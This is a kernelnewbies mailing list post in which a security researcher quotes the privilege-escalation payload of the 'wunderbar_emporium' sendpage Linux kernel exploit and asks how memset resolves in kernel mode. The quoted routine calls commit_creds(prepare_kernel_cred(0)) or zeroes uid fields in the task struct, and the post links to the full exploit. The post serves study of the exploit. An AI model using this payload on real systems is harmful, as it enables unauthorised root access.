An exploit about sendpage:
http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium.tgz
I read the exploit code and have some questions.
---------------------------------------------------------------------------------------
There is some code:

    static void give_it_to_me_any_way_you_can(void)
    {
        if (commit_creds && prepare_kernel_cred) {
            /* newer kernels: credential API is present */
            commit_creds(prepare_kernel_cred(0));
            got_root = 1;
        } else {
            /* older kernels: scan the task struct for the uid fields */
            unsigned int *current;
            unsigned long orig_current;
            unsigned long orig_current_4k = 0;

            if (sizeof(unsigned long) != sizeof(unsigned int))
                orig_current = get_current_x64();
            else {
                orig_current = orig_current_4k = get_current_4k();
                if (orig_current == 0)
                    orig_current = get_current_8k();
            }
    repeat:
            current = (unsigned int *)orig_current;
            while (((unsigned long)current < (orig_current + 0x1000 - 17))
                   &&
                   (current[0] != our_uid || current[1] != our_uid ||
                    current[2] != our_uid || current[3] != our_uid))
                current++;
            if ((unsigned long)current >= (orig_current + 0x1000 - 17)) {
                if (orig_current == orig_current_4k) {
                    orig_current = get_current_8k();
                    goto repeat;
                }
                return;
            }
            got_root = 1;
            memset(current, 0, sizeof(unsigned int) * 8);
        }
        return;
    }

    static int __attribute__((regparm(3))) own_the_kernel(unsigned long a,
            unsigned long b, unsigned long c, unsigned long d, unsigned long e)
    {
        ......
        // push it real good
        give_it_to_me_any_way_you_can();
        return -1;
    }
-------------------------------------------------------------------------------------------
own_the_kernel() will run in kernel mode when the bug is triggered from user mode.
BUT give_it_to_me_any_way_you_can() calls memset(), and memset() is a
function in glibc.
In kernel mode, can it call a function in glibc? How is the symbol resolved?
--
Best Regards :-)
-------------------------------------------
Wang Yao(王耀),[email protected] [email protected]
HomePage: http://cudev.cublog.cn
Research Center of Computer Network and Information Security
Technology Harbin Institute Of Technology
Address: No. 92 West Da-Zhi Street, NanGang District, Harbin, Heilongjiang
--
To unsubscribe from this list: send an email with
"unsubscribe kernelnewbies" to [email protected]
Please read the FAQ at http://kernelnewbies.org/FAQ